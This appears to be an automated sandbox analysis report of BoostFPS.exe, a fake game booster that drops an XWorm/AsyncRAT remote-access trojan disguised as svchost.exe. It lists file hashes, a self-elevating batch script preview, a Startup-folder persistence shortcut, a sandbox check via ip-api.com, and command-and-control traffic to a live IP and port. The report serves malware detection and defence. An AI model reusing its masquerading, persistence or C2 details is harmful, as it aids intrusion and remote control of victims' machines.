                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzm31iqy.54h.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xhxc2g0f.nd2.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ysmqhlt4.gvc.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Roaming\FPS_BY FILMGODX.bat

                                                      Download File
                                                      Process:C:\Users\user\Desktop\BoostFPS.exe
                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):6752
                                                      Entropy (8bit):5.504203031382958
                                                      Encrypted:false
                                                      SSDEEP:96:U1wM477Tq51SS9psSmFsGe1+7zb8lpoCQFZNZuMSwCw0wCZeBWBgKrafGn:iwb77TqLSCpk9e1+7zb8jorZLxZG
                                                      MD5:73FA858851AB9F0CB193111D183A3BA5
                                                      SHA1:3B6B20D02CE3E39A45B94984D150009E6EA501CB
                                                      SHA-256:C63A1B8C63ACB2C4CAB3617934A7A88A7B7DC19A2A1144B7F1B1207FF95F26BB
                                                      SHA-512:A08237EFF698B5FEE0909D1FC71A317D64408FD6CCE378A259F7D3AC52577A927B553A10182D5D6552868D21A41A961760F49A987BBBAEADABEFEEE659457BA4
                                                      Malicious:false
                                                      Preview:....@echo Off..Mode 100,25.. title Free Fps MPro..:bitch.. chcp 65001........if %errorlevel% neq 0 start "" /wait /I /min powershell -NoProfile -Command start -verb runas "'%~s0'" && exit /b.... ::Blank/Color Character..for /F "tokens=1,2 delims=#" %%a in ('"prompt #$H#$E# & echo on & for %%b in (1) do rem"') do (set "DEL=%%a" & set "COL=%%b")..:menu......cls..ECHO. ..ECHO. %COL%[35m................................................................... ..ECHO. ................................................................... ..ECHO. ..............................................

                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Nov 20 08:37:03 2024, mtime=Wed Nov 20 08:37:03 2024, atime=Wed Nov 20 08:37:03 2024, length=78848, window=hide
                                                      Category:dropped
                                                      Size (bytes):765
                                                      Entropy (8bit):5.050321330831363
                                                      Encrypted:false
                                                      SSDEEP:12:8s24f4QM88CZlsY//w8cS0Lkx0N4fjANNHkZCVmV:82f4QH86ZWqANSYVm
                                                      MD5:74F78E4AF70BC5920AD649565109A74C
                                                      SHA1:02D1C119AECFCCB1B553D453C82C1F710A452C0E
                                                      SHA-256:A35BFE484CF2B5518D821F6C7145D014D73CB17F06649A10B0AB810524474656
                                                      SHA-512:50CB1326994937D33182D01758EE51F3FA240CE451E7F308EF6526C59EF834A3AC99CB05F969858FFDD8B598A8CAFAC868C86AE6CDB4FA3D756E5AEE3234AE4F
                                                      Malicious:false
                                                      Preview:L..................F.... ....X~./;..b../;...X~./;...4......................v.:..DG..Yr?.D..U..k0.&...&...... M........./;.... ./;......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSltY.L....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....tY.L..Roaming.@......DWSltY.L....C.......................e.R.o.a.m.i.n.g.....b.2..4..tY.L .svchost.exe.H......tY.LtY.L............................e.s.v.c.h.o.s.t...e.x.e.......Z...............-.......Y.............f......C:\Users\user\AppData\Roaming\svchost.exe........\.....\.....\.....\.....\.s.v.c.h.o.s.t...e.x.e.`.......X.......745773...........hT..CrF.f4... .7...#....,...W..hT..CrF.f4... .7...#....,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                      C:\Users\user\AppData\Roaming\svchost.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\BoostFPS.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):78848
                                                      Entropy (8bit):5.954087952004513
                                                      Encrypted:false
                                                      SSDEEP:1536:GVi5NpODHk+B8tsOR88XChEab22lteZrITX6RL99OWzFXgqr:x5zODHkvt7hChEab22nkIToZ9OoFXNr
                                                      MD5:A50564ADE45C0A409BB38C06673D6AB9
                                                      SHA1:91FD3510C4CCDC50D0EB08249C945271171D5F9F
                                                      SHA-256:120B13C9EDBD9F2FFF0CA2E31EFB17CEF3CAC1EA1B4025E8BC7B512F74021A6E
                                                      SHA-512:7FB99769609027E850C5D6D69912B5DFE82025F24947FA9BFF8D88A966FFDA315DEE8C77086EF171CF75089B6B4D6CB98975B53CBBA040C40AF50248C4F65CD0
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 84%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...h.(g.................*...........H... ...`....@.. ....................................@.................................XH..S....`............................................................................... ............... ..H............text....(... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................H......H........b..........&.....................................................(....*.r...p*. ...*..(....*.r...p*. ....*.s.........s.........s.........s.........*.r...p*. S...*.r0..p*.rp..p*. m.`.*.r...p*. .s..*.r...p*. .x!.*..((...*.r...p*. .u..*.r>..p*. ....*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. ].b.*.r...p*. ..e.*.r...p*. ...*.r...p*. .(T.*.r...p*.r...p*. .9..*.r...p*. ~.H.*.r..

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.872837502974606
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:BoostFPS.exe
                                                      File size:100'352 bytes
                                                      MD5:20f5290def51514fefaed2b744ed961c
                                                      SHA1:546f5c611c1d35c5104e2792c76934746f637987
                                                      SHA256:3e6f0de70c94df15b3aecb8ce4370e26b62fa38a24bf3710d0d9f0a28b4da656
                                                      SHA512:578c4cc3b0375587d13f4b6f28d063322aa4df1dc3a439bc2f22da57475d191b78f7cc6590483ba4462af5a70d7aa73fb6784ae527e46f8e64cb31b3274ef3e2
                                                      SSDEEP:3072:gZtcSVYnM7ByozguHogUDqGB5xY7iBCYs9:gXFyaByoUuInqs0
                                                      TLSH:0DA3F1EE27A5D82ECCE121B25828910E436F4F8399E71F2F24C92A29F011B705D77D75
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.(g.................~............... ........@.. ....................................@................................

                                                      File Icon

                                                      Icon Hash:00928e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x419d2e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x67280E30 [Sun Nov 3 23:58:40 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x19cdc0x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x4ee.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1c0000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x17d340x17e00349b1b364916a0c9d9e9bed83bc52953False0.9421118291884817data7.926723027968396IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x1a0000x4ee0x600ce857e2d91ee54d5b2dcc147ff0a4b47False0.3828125data3.8231981222590274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x1c0000xc0x2004bffdc894b17403c14e8d6246447683fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_VERSION0x1a0a00x264data0.47058823529411764
                                                      RT_MANIFEST0x1a3040x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-11-20T10:38:22.520365+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.54997945.141.27.2487777TCP
                                                      2024-11-20T10:38:23.025464+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.27.2487777192.168.2.549979TCP
                                                      2024-11-20T10:38:23.234175+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54997945.141.27.2487777TCP
                                                      2024-11-20T10:38:30.155148+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.27.2487777192.168.2.549979TCP
                                                      2024-11-20T10:38:30.155148+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2145.141.27.2487777192.168.2.549979TCP
                                                      2024-11-20T10:38:37.774760+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.27.2487777192.168.2.549979TCP
                                                      2024-11-20T10:38:37.779144+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54997945.141.27.2487777TCP
                                                      2024-11-20T10:38:52.524533+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.27.2487777192.168.2.549979TCP
                                                      2024-11-20T10:38:52.684134+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54997945.141.27.2487777TCP
                                                      2024-11-20T10:39:00.152420+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.27.2487777192.168.2.549979TCP
                                                      2024-11-20T10:39:00.152420+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2145.141.27.2487777192.168.2.549979TCP
                                                      2024-11-20T10:39:07.971525+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.27.2487777192.168.2.549979TCP
                                                      2024-11-20T10:39:07.972978+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54997945.141.27.2487777TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 20, 2024 10:37:08.379210949 CET4970480192.168.2.5208.95.112.1
                                                      Nov 20, 2024 10:37:08.390538931 CET8049704208.95.112.1192.168.2.5
                                                      Nov 20, 2024 10:37:08.390616894 CET4970480192.168.2.5208.95.112.1
                                                      Nov 20, 2024 10:37:08.391427994 CET4970480192.168.2.5208.95.112.1
                                                      Nov 20, 2024 10:37:08.401712894 CET8049704208.95.112.1192.168.2.5
                                                      Nov 20, 2024 10:37:08.880258083 CET8049704208.95.112.1192.168.2.5
                                                      Nov 20, 2024 10:37:08.921600103 CET4970480192.168.2.5208.95.112.1
                                                      Nov 20, 2024 10:38:07.696852922 CET499797777192.168.2.545.141.27.248
                                                      Nov 20, 2024 10:38:07.704927921 CET77774997945.141.27.248192.168.2.5
                                                      Nov 20, 2024 10:38:07.705030918 CET499797777192.168.2.545.141.27.248
                                                      Nov 20, 2024 10:38:07.776237011 CET499797777192.168.2.545.141.27.248
                                                      Nov 20, 2024 10:38:07.781169891 CET77774997945.141.27.248192.168.2.5
                                                      Nov 20, 2024 10:38:08.143608093 CET8049704208.95.112.1192.168.2.5
                                                      Nov 20, 2024 10:38:08.143682957 CET4970480192.168.2.5208.95.112.1
                                                      Nov 20, 2024 10:38:22.520365000 CET499797777192.168.2.545.141.27.248
                                                      Nov 20, 2024 10:38:22.528187037 CET77774997945.141.27.248192.168.2.5
                                                      Nov 20, 2024 10:38:23.025464058 CET77774997945.141.27.248192.168.2.5
                                                      Nov 20, 2024 10:38:23.078115940 CET499797777192.168.2.545.141.27.248
                                                      Nov 20, 2024 10:38:23.234174967 CET499797777192.168.2.545.141.27.248
                                                      Nov 20, 2024 10:38:23.239095926 CET77774997945.141.27.248192.168.2.5
                                                      Nov 20, 2024 10:38:30.155148029 CET77774997945.141.27.248192.168.2.5
                                                      Nov 20, 2024 10:38:30.203119993 CET499797777192.168.2.545.141.27.248
                                                      Nov 20, 2024 10:38:37.266052008 CET499797777192.168.2.545.141.27.248
                                                      Nov 20, 2024 10:38:37.270927906 CET77774997945.141.27.248192.168.2.5
                                                      Nov 20, 2024 10:38:37.774760008 CET77774997945.141.27.248192.168.2.5
                                                      Nov 20, 2024 10:38:37.779144049 CET499797777192.168.2.545.141.27.248
                                                      Nov 20, 2024 10:38:37.784056902 CET77774997945.141.27.248192.168.2.5
                                                      Nov 20, 2024 10:38:48.892179966 CET4970480192.168.2.5208.95.112.1
                                                      Nov 20, 2024 10:38:48.898353100 CET8049704208.95.112.1192.168.2.5
                                                      Nov 20, 2024 10:38:52.017630100 CET499797777192.168.2.545.141.27.248
                                                      Nov 20, 2024 10:38:52.022753954 CET77774997945.141.27.248192.168.2.5
                                                      Nov 20, 2024 10:38:52.524533033 CET77774997945.141.27.248192.168.2.5
                                                      Nov 20, 2024 10:38:52.583623886 CET499797777192.168.2.545.141.27.248
                                                      Nov 20, 2024 10:38:52.684134007 CET499797777192.168.2.545.141.27.248
                                                      Nov 20, 2024 10:38:52.690679073 CET77774997945.141.27.248192.168.2.5
                                                      Nov 20, 2024 10:39:00.152420044 CET77774997945.141.27.248192.168.2.5
                                                      Nov 20, 2024 10:39:00.203191042 CET499797777192.168.2.545.141.27.248
                                                      Nov 20, 2024 10:39:07.473721027 CET499797777192.168.2.545.141.27.248
                                                      Nov 20, 2024 10:39:07.478612900 CET77774997945.141.27.248192.168.2.5
                                                      Nov 20, 2024 10:39:07.971524954 CET77774997945.141.27.248192.168.2.5
                                                      Nov 20, 2024 10:39:07.972978115 CET499797777192.168.2.545.141.27.248
                                                      Nov 20, 2024 10:39:07.978105068 CET77774997945.141.27.248192.168.2.5

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 20, 2024 10:37:08.295430899 CET6359053192.168.2.51.1.1.1
                                                      Nov 20, 2024 10:37:08.306848049 CET53635901.1.1.1192.168.2.5

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Nov 20, 2024 10:37:08.295430899 CET192.168.2.51.1.1.10xca37Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Nov 20, 2024 10:37:08.306848049 CET1.1.1.1192.168.2.50xca37No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • ip-api.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.549704208.95.112.1807160C:\Users\user\AppData\Roaming\svchost.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 20, 2024 10:37:08.391427994 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                      Host: ip-api.com
                                                      Connection: Keep-Alive
                                                      Nov 20, 2024 10:37:08.880258083 CET175INHTTP/1.1 200 OK
                                                      Date: Wed, 20 Nov 2024 09:37:08 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 6
                                                      Access-Control-Allow-Origin: *
                                                      X-Ttl: 60
                                                      X-Rl: 44
                                                      Data Raw: 66 61 6c 73 65 0a
                                                      Data Ascii: false


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:04:36:58
                                                      Start date:20/11/2024
                                                      Path:C:\Users\user\Desktop\BoostFPS.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\BoostFPS.exe"
                                                      Imagebase:0xd0000
                                                      File size:100'352 bytes
                                                      MD5 hash:20F5290DEF51514FEFAED2B744ED961C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:04:37:03
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\FPS_BY FILMGODX.bat" "
                                                      Imagebase:0x7ff79cc40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:3
                                                      Start time:04:37:03
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:4
                                                      Start time:04:37:03
                                                      Start date:20/11/2024
                                                      Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                      Imagebase:0x1a0000
                                                      File size:78'848 bytes
                                                      MD5 hash:A50564ADE45C0A409BB38C06673D6AB9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.3313721624.00000000025EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 84%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:5
                                                      Start time:04:37:03
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\mode.com
                                                      Wow64 process (32bit):false
                                                      Commandline:Mode 100,25
                                                      Imagebase:0x7ff6a0180000
                                                      File size:33'280 bytes
                                                      MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:04:37:03
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\chcp.com
                                                      Wow64 process (32bit):false
                                                      Commandline:chcp 65001
                                                      Imagebase:0x7ff7ff6a0000
                                                      File size:14'848 bytes
                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

